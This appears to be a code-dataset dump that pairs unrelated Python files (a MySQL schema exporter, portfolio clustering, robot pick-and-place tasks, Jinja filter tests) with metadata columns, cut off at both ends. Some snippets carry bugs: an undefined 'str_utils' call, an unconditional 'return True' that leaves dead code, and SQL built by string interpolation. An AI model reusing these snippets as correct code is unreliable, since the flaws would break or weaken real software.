zf.write(path, os.path.relpath(path, base_path))
| 34.841463
| 125
| 0.672384
| 336
| 2,857
| 5.556548
| 0.357143
| 0.054633
| 0.042849
| 0.038565
| 0.162828
| 0.151044
| 0.109266
| 0.080343
| 0.080343
| 0
| 0
| 0.002699
| 0.221911
| 2,857
| 81
| 126
| 35.271605
| 0.837157
| 0.021351
| 0
| 0.115385
| 0
| 0
| 0.109996
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.153846
| 0.019231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe87946e35b940790f2abaab6a2a55e9294ad44f
| 7,305
|
py
|
Python
|
echoscope/source/mysql_source.py
|
treeyh/echoscope
|
ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da
|
[
"MIT"
] | 1
|
2022-01-18T09:19:38.000Z
|
2022-01-18T09:19:38.000Z
|
echoscope/source/mysql_source.py
|
treeyh/echoscope
|
ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da
|
[
"MIT"
] | null | null | null |
echoscope/source/mysql_source.py
|
treeyh/echoscope
|
ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da
|
[
"MIT"
] | 1
|
2022-01-18T09:19:39.000Z
|
2022-01-18T09:19:39.000Z
|
# -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
class MysqlSource(source.Source):
def __init__(self):
self.excludesDb = ['information_schema', 'performance_schema', 'mysql', 'sys', 'test']
def export_model(self, conf: config_model.DataSourceConfig) -> ds_model.DataSourceModel:
mysqlUtil = mysql_util.get_mysql_util(
host=conf.host, port=conf.port, user=conf.user, passwd=conf.passwd, db=conf.db, charset=conf.charset)
ver = self.get_db_version(mysqlUtil)
if ver == '':
logging.error(' mysql conn fail. ')
return
dsm = ds_model.DataSourceModel(
name='%s:%d' % (conf.host, conf.port), dbType=config.DsMysql, version=ver)
dsm.dbs = self.get_export_dbs(mysqlUtil, conf.includes, conf.excludes)
dsm = self.fill_table_fields(mysqlUtil, dsm)
return dsm
def get_db_version(self, conn: mysql_util.MysqlUtil) -> str:
"""获取mysql版本
Args:
conn (mysql_util.MysqlUtil): [description]
Returns:
str: [description]
"""
sql = 'select version() as ver from dual'
cols = ['ver']
ver = conn.find_one(sql, (), cols)
return '' if ver == None else str_util.format_bytes_to_str(ver.get('ver', ''))
def get_export_dbs(self, conn: mysql_util.MysqlUtil, includes: List[str] = [], excludes: List[str] = []) -> List[ds_model.DbModel]:
"""获取需要导出结构的数据库列表
Args:
conn (mysql_util.MysqlUtil): 数据库连接
includes (List[str], optional): 需要包含的数据库列表. Defaults to [].
excludes (List[str], optional): 需要排除的数据库列表. Defaults to [].
Returns:
List[ds_model.DbModel]: 需要导出的数据库列表
"""
sql = 'select SCHEMA_NAME AS db_name, DEFAULT_CHARACTER_SET_NAME as charset, DEFAULT_COLLATION_NAME as collation_name from `information_schema`.SCHEMATA '
cols = ['db_name', 'charset', 'collation_name']
data = conn.find_all(sql, (), cols)
dbs = []
for d in data:
db_name = str_util.format_bytes_to_str(d['db_name'])
if db_name in self.excludesDb or db_name in excludes:
# 需要过滤
continue
if len(includes) > 0 and db_name not in includes:
# 不包含在include中
continue
charset = str_util.format_bytes_to_str(d['charset'])
collation_name = str_util.format_bytes_to_str(d['collation_name'])
dbModel = ds_model.DbModel(
name=db_name, charset=charset, collation_name=collation_name)
dbs.append(dbModel)
return dbs
def fill_table_fields(self, conn: mysql_util.MysqlUtil, dsModel: ds_model.DataSourceModel) -> ds_model.DataSourceModel:
"""获取数据库中的表信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表
Returns:
ds_model.DataSourceModel: 数据源
"""
sql = ''' select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' '''
cols = ['TABLE_NAME', 'ENGINE', 'TABLE_COLLATION', 'TABLE_COMMENT']
for db in dsModel.dbs:
data = conn.find_all(sql, (db.name, ), cols)
tables: ds_model.TableModel = []
for d in data:
tableName = str_util.format_bytes_to_str(d['TABLE_NAME'])
comment = str_util.format_bytes_to_str(d['TABLE_COMMENT'])
collation_name = str_util.format_bytes_to_str(d['TABLE_COLLATION'])
engine = str_util.format_bytes_to_str(d['ENGINE'])
table = ds_model.TableModel(
name=tableName, comment=comment, collation_name=collation_name, engine=engine)
logging.info('load table:%s fields.' % tableName)
table.fields = self.get_fields(conn, db.name, tableName)
table.create_script = self.get_create_script(conn, db.name, tableName)
tables.append(table)
db.tables = tables
return dsModel
def get_create_script(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> str:
"""获取表的创建脚本
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名称
tableName (str): 表名称
Returns:
str: 创建脚本
"""
sql = ''' SHOW CREATE TABLE `%s`.`%s` ''' % (dbName, tableName)
cols = ['Table', 'Create Table']
data = conn.find_one(sql, (), cols)
return '' if data == None else str_util.format_bytes_to_str(data.get('Create Table', ''))
def get_fields(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> List[ds_model.FieldModel]:
"""获取数据表中列信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名
tableName (str): 表名
Returns:
List[ds_model.FieldModel]: 列列表
"""
sql = ''' select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC '''
cols = ['TABLE_SCHEMA', 'TABLE_NAME', 'COLUMN_NAME', 'ORDINAL_POSITION', 'COLUMN_DEFAULT',
'IS_NULLABLE', 'DATA_TYPE', 'CHARACTER_MAXIMUM_LENGTH', 'NUMERIC_PRECISION', 'NUMERIC_SCALE',
'CHARACTER_SET_NAME', 'COLLATION_NAME', 'COLUMN_TYPE', 'COLUMN_KEY', 'EXTRA', 'COLUMN_COMMENT']
data = conn.find_all(sql, (dbName, tableName, ), cols)
fields = []
for d in data:
fname = str_util.format_bytes_to_str(d['COLUMN_NAME'])
ftype = str_util.format_bytes_to_str(d['DATA_TYPE'])
column_type = str_utils.format_bytes_to_str(d['COLUMN_TYPE'])
length = str_util.format_bytes_to_str(
d['CHARACTER_MAXIMUM_LENGTH']) if d['CHARACTER_MAXIMUM_LENGTH'] != None else str_util.format_bytes_to_str(d['NUMERIC_PRECISION'])
scale = str_util.format_bytes_to_str(d['NUMERIC_SCALE'])
# on update CURRENT_TIMESTAMP
default = str_util.format_bytes_to_str(d['COLUMN_DEFAULT'])
ext = str_util.format_bytes_to_str(d['EXTRA'])
if default == 'CURRENT_TIMESTAMP':
if 'on update CURRENT_TIMESTAMP' in ext:
default = 'update_time'
else:
default = 'create_time'
nullFlag = str_util.format_bytes_to_str(d['IS_NULLABLE'])
comment = str_util.format_bytes_to_str(d['COLUMN_COMMENT'])
charset = str_util.format_bytes_to_str(d['CHARACTER_SET_NAME'])
collation_name = str_util.format_bytes_to_str(d['COLLATION_NAME'])
indexFlag = 0
column_key = str_util.format_bytes_to_str(d['COLUMN_KEY'])
if column_key == 'PRI':
indexFlag = 1
elif column_key == 'UNI':
indexFlag = 3
elif column_key == 'MUL':
indexFlag = 2
indexName = ''
autoInc = False
if 'auto_increment' in ext:
autoInc = True
field = ds_model.FieldModel(name=fname, ftype=ftype, length=length, scale=scale, default=default, nullFlag=nullFlag,
comment=comment, charset=charset, collation_name=collation_name, indexFlag=indexFlag, indexName=indexName, autoInc=autoInc)
fields.append(field)
return fields
| 39.701087
| 411
| 0.675975
| 951
| 7,305
| 4.921136
| 0.178759
| 0.032906
| 0.061111
| 0.075214
| 0.379915
| 0.350214
| 0.296154
| 0.247009
| 0.13141
| 0.103419
| 0
| 0.001034
| 0.205613
| 7,305
| 183
| 412
| 39.918033
| 0.805445
| 0.113895
| 0
| 0.046296
| 0
| 0.018519
| 0.240057
| 0.036286
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064815
| false
| 0.009259
| 0.055556
| 0
| 0.194444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8a7abf97fc4938deedb4a0e775164e6040fb1b
| 1,042
|
py
|
Python
|
test-drf-project/tests/conftest.py
|
fvlima/drf-view-profiler
|
a61d48e9835679f812d69d24ea740b947836108c
|
[
"MIT"
] | 30
|
2019-10-16T12:48:16.000Z
|
2021-11-23T08:57:27.000Z
|
test-drf-project/tests/conftest.py
|
fvlima/drf-view-profiler
|
a61d48e9835679f812d69d24ea740b947836108c
|
[
"MIT"
] | null | null | null |
test-drf-project/tests/conftest.py
|
fvlima/drf-view-profiler
|
a61d48e9835679f812d69d24ea740b947836108c
|
[
"MIT"
] | 1
|
2021-11-23T07:28:04.000Z
|
2021-11-23T07:28:04.000Z
|
from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def mock_http_request():
http_request = HttpRequest()
http_request.method = "GET"
return http_request
@pytest.fixture
def mock_http_response(mock_http_request):
response = Response()
mock_http_request.line_profiler = mock.Mock()
mock_http_request.parser_context = {"view": mock.Mock()}
response.renderer_context = {"request": mock_http_request}
return response
@pytest.fixture
def mock_output_writer(monkeypatch):
mock_output_writer_ = mock.Mock()
monkeypatch.setattr("drf_viewset_profiler.middleware.output_writer.stream", mock_output_writer_)
return mock_output_writer_
@pytest.fixture
def mock_line_profiler_viewset_middleware():
return LineProfilerViewSetMiddleware()
| 24.809524
| 100
| 0.794626
| 126
| 1,042
| 6.246032
| 0.285714
| 0.111817
| 0.101652
| 0.101652
| 0.060991
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130518
| 1,042
| 41
| 101
| 25.414634
| 0.868653
| 0
| 0
| 0.172414
| 0
| 0
| 0.06334
| 0.049904
| 0
| 0
| 0
| 0
| 0
| 1
| 0.172414
| false
| 0
| 0.206897
| 0.068966
| 0.551724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8b3957ceddf0ec804e544f4e167363b9d84f54
| 3,553
|
py
|
Python
|
Examples/VirtualLab/virtual_experiment_f.py
|
diehlpk/muDIC
|
b5d90aa62267b4bd0b88ae0a989cf09a51990654
|
[
"MIT"
] | 70
|
2019-04-15T08:08:23.000Z
|
2022-03-23T08:24:25.000Z
|
Examples/VirtualLab/virtual_experiment_f.py
|
diehlpk/muDIC
|
b5d90aa62267b4bd0b88ae0a989cf09a51990654
|
[
"MIT"
] | 34
|
2019-05-03T18:09:43.000Z
|
2022-02-10T11:36:29.000Z
|
Examples/VirtualLab/virtual_experiment_f.py
|
diehlpk/muDIC
|
b5d90aa62267b4bd0b88ae0a989cf09a51990654
|
[
"MIT"
] | 37
|
2019-04-25T15:39:23.000Z
|
2022-03-28T21:40:24.000Z
|
# This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| 36.628866
| 112
| 0.731776
| 554
| 3,553
| 4.595668
| 0.406137
| 0.009427
| 0.005892
| 0.010605
| 0.070699
| 0.016496
| 0.016496
| 0.010212
| 0
| 0
| 0
| 0.036651
| 0.162961
| 3,553
| 96
| 113
| 37.010417
| 0.819435
| 0.249648
| 0
| 0
| 0
| 0
| 0.121317
| 0.014731
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.137255
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8d5aa19fb8f623818fa75491db0f6d028311d8
| 3,203
|
py
|
Python
|
Optimisation Portfolios/HERC.py
|
BrandonAFong/Ideas
|
5d38be2dfaba12a534220e3f28a6c9da9aefcdec
|
[
"MIT"
] | null | null | null |
Optimisation Portfolios/HERC.py
|
BrandonAFong/Ideas
|
5d38be2dfaba12a534220e3f28a6c9da9aefcdec
|
[
"MIT"
] | null | null | null |
Optimisation Portfolios/HERC.py
|
BrandonAFong/Ideas
|
5d38be2dfaba12a534220e3f28a6c9da9aefcdec
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
def intersection(list1, list2):
intersec = [set(list1) & set(list2)]
return intersec
def compute_allocation(covar, clusters,Z,dimensions):
numClusters = len(clusters)
aWeights = np.array([1.] * len(covar))
cWeights = np.array([1.] * numClusters)
cVar = np.array([0.] * numClusters)
for i, cluster in clusters.items():
cluster_covar = covar[cluster, :][:, cluster]
inv_diag = 1 / np.diag(cluster_covar)
aWeights[cluster] = inv_diag / np.sum(inv_diag)
for i, cluster in clusters.items():
weights = aWeights[cluster]
cVar[i - 1] = np.dot(
weights, np.dot(covar[cluster, :][:, cluster], weights))
for m in range(numClusters - 1):
left = int(Z[dimensions - 2 - m, 0])
lc = seriation(Z, dimensions, left)
right = int(Z[dimensions - 2 - m, 1])
rc = seriation(Z, dimensions, right)
id_lc = []
id_rc = []
for i, cluster in clusters.items():
if sorted(intersection(lc, cluster)) == sorted(cluster):
id_lc.append(i)
if sorted(intersection(rc, cluster)) == sorted(cluster):
id_rc.append(i)
id_lc = np.array(id_lc) - 1
id_rc = np.array(id_rc) - 1
alpha = 0
lcVar = np.sum(cVar[id_lc])
rcVar = np.sum(cVar[id_rc])
alpha = lcVar / (lcVar + rcVar)
cWeights[id_lc] = cWeights[
id_lc] * alpha
cWeights[id_rc] = cWeights[
id_rc] * (1 - alpha)
for i, cluster in clusters.items():
aWeights[cluster] = aWeights[cluster] * cWeights[
i - 1]
return aWeights
#Dataframe of returns
def HERC(mat_ret):
#Need to first calculate the optimal number of clusters
#The mat_ret that goes into this must be a np array of returns
# correl_mat = mat_ret.corr(method='pearson')
column_dic = {k:v for v, k in enumerate(mat_ret.columns)}
correl_mat = df_to_matrix(mat_ret.corr(method='pearson'))
dist = 1 - correl_mat
dim = len(dist)
tri_a, tri_b = np.triu_indices(dim, k = 1)
Z = fastcluster.linkage(dist[tri_a, tri_b], method='ward')
optimalK = OptimalK(parallel_backend = 'rust')
n_clusters = optimalK(mat_ret.values, cluster_array = np.arange(1,len(mat_ret)))
nb_clusters = n_clusters
clustering_inds = fcluster(Z, nb_clusters, criterion='maxclust')
clusters = {i: [] for i in range(min(clustering_inds),max(clustering_inds) + 1)}
for i, v in enumerate(clustering_inds):
clusters[v].append(i)
HERC_w = compute_allocation(correl_mat, clusters, Z, dim)
HERC_w = pd.Series(HERC_w)
my_inverted_dict = dict(map(reversed, column_dic.items()))
HERC_w = HERC_w.rename(index = my_inverted_dict)
return HERC_w
| 28.345133
| 84
| 0.609429
| 435
| 3,203
| 4.34023
| 0.328736
| 0.014831
| 0.023305
| 0.027542
| 0.10911
| 0.055085
| 0
| 0
| 0
| 0
| 0
| 0.015866
| 0.271933
| 3,203
| 113
| 85
| 28.345133
| 0.793739
| 0.086794
| 0
| 0.058824
| 0
| 0
| 0.007898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044118
| false
| 0
| 0.102941
| 0
| 0.191176
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe908006796adb02dbc2aa1b3ab9fa0ac75b1812
| 5,574
|
py
|
Python
|
sawyer/mujoco/tasks/transition_pick_and_place_task.py
|
rlagywjd802/gym-sawyer
|
385bbeafcccb61afb9099554f6a99b16f1f1a7c5
|
[
"MIT"
] | null | null | null |
sawyer/mujoco/tasks/transition_pick_and_place_task.py
|
rlagywjd802/gym-sawyer
|
385bbeafcccb61afb9099554f6a99b16f1f1a7c5
|
[
"MIT"
] | null | null | null |
sawyer/mujoco/tasks/transition_pick_and_place_task.py
|
rlagywjd802/gym-sawyer
|
385bbeafcccb61afb9099554f6a99b16f1f1a7c5
|
[
"MIT"
] | null | null | null |
import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
class TransitionTask(ComposableTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self):
pass
def compute_reward(self, obs, info):
return 0
def is_success(self, obs, info=None, init=None):
raise NotImplementedError
def is_terminate(self, obs, init):
return self.is_success(obs, init=init)
def is_fail(self, obs):
raise NotImplementedError
def reset(self):
pass
@property
def completion_bonus(self):
return self._completion_bonus
class TransitionPickTask(TransitionTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.05,
object_lift_target=0.3,
completion_bonus=0):
self._success_thresh = success_thresh
self._obj_lift_target = object_lift_target
self._completion_bonus = completion_bonus
self._t = 0
def is_success(self, obs, info=None, init=None):
return True
if init:
self.reset()
goal = obs[11:14] + np.array([0, 0, 0.04])
box_pos = obs[4:7]
d = np.linalg.norm(box_pos - goal, axis=-1)
print("****[pick/is success] box_pos:{}, goal:{}, d:{}".format(box_pos, goal, d))
return d < self._success_thresh
def is_fail(self, obs):
self._t += 1
if self._t >= 1 and not self.is_success(obs):
return True
return False
def reset(self):
self._t = 0
class TransitionPlaceTask(TransitionTask):
"""
Task to place object at a desired location.
"""
def __init__(self,
success_thresh=0.015,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
print("****[place/is success] abs_diff:{}".format(abs_diff))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.21 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff:
return True
else:
self._prev_box_pos = box_pos
return False
def reset(self):
self._prev_box_pos = None
class TransitionPickAndPlaceTask(TransitionTask):
"""
Task to pick up an object and place the object at a desired location.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.01,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
self._picked = False
self._placing = False
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.02
abs_diff = abs(box_pos - goal)
print("****[pick&place/is success] abs_diff:{}, box_z:{}".format(abs_diff, box_pos[2]))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.22 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
abs_diff = abs(box_pos - goal)
max_xy_diff = 0.03
if self._picked:
self._placing = True
print("placing True")
else:
print("placing False")
if self._picked and not self._placing:
print("return True")
return True
self._picked = True
if self._placing:
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[pick&place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if box_pos[2] < 0.24 and (abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff):
print("return True")
return True
else:
self._prev_box_pos = box_pos
return False
def get_next_primitive(self, obs, prev_primitive):
if prev_primitive == -1:
return 'pick'
return 'place'
def reset(self):
self._picked = False
self._placing = False
self._prev_box_pos = None
| 28.880829
| 121
| 0.571582
| 760
| 5,574
| 3.911842
| 0.142105
| 0.084763
| 0.0518
| 0.065927
| 0.685167
| 0.612176
| 0.54995
| 0.523713
| 0.523713
| 0.506895
| 0
| 0.028877
| 0.329028
| 5,574
| 192
| 122
| 29.03125
| 0.766043
| 0.079117
| 0
| 0.669118
| 0
| 0
| 0.054884
| 0.004755
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0.014706
| 0.014706
| 0.022059
| 0.308824
| 0.080882
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe90ddd8fb4cfe4289850e4b9709b973ed6310cd
| 36,485
|
py
|
Python
|
tests/app/test_jinja_filters.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | null | null | null |
tests/app/test_jinja_filters.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | 1
|
2018-11-05T12:00:51.000Z
|
2018-11-05T12:00:51.000Z
|
tests/app/test_jinja_filters.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
class TestJinjaFilters(AppContextTestCase): # pylint: disable=too-many-public-methods
def setUp(self):
self.autoescape_context = Mock(autoescape=True)
super(TestJinjaFilters, self).setUp()
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency_for_input(self):
self.assertEqual(format_currency_for_input('100', 2), '100.00')
self.assertEqual(format_currency_for_input('100.0', 2), '100.00')
self.assertEqual(format_currency_for_input('100.00', 2), '100.00')
self.assertEqual(format_currency_for_input('1000'), '1,000')
self.assertEqual(format_currency_for_input('10000'), '10,000')
self.assertEqual(format_currency_for_input('100000000'), '100,000,000')
self.assertEqual(format_currency_for_input('100000000', 2), '100,000,000.00')
self.assertEqual(format_currency_for_input(0, 2), '0.00')
self.assertEqual(format_currency_for_input(0), '0')
self.assertEqual(format_currency_for_input(''), '')
self.assertEqual(format_currency_for_input(None), '')
self.assertEqual(format_currency_for_input(Undefined()), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_get_currency_symbol(self):
self.assertEqual(get_currency_symbol('GBP'), '£')
self.assertEqual(get_currency_symbol('EUR'), '€')
self.assertEqual(get_currency_symbol('USD'), 'US$')
self.assertEqual(get_currency_symbol('JPY'), 'JP¥')
self.assertEqual(get_currency_symbol(''), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency(self):
self.assertEqual(format_currency(self.autoescape_context, '11', 'GBP'), "<span class='date'>£11.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '11.99', 'GBP'), "<span class='date'>£11.99</span>")
self.assertEqual(format_currency(self.autoescape_context, '11000', 'USD'), "<span class='date'>US$11,000.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0.00), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '', ), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, None), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, Undefined()), "<span class='date'></span>")
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_number(self):
self.assertEqual(format_number(123), '123')
self.assertEqual(format_number('123.4'), '123.4')
self.assertEqual(format_number('123.40'), '123.4')
self.assertEqual(format_number('1000'), '1,000')
self.assertEqual(format_number('10000'), '10,000')
self.assertEqual(format_number('100000000'), '100,000,000')
self.assertEqual(format_number(0), '0')
self.assertEqual(format_number(0.00), '0')
self.assertEqual(format_number(''), '')
self.assertEqual(format_number(None), '')
self.assertEqual(format_number(Undefined()), '')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
# When
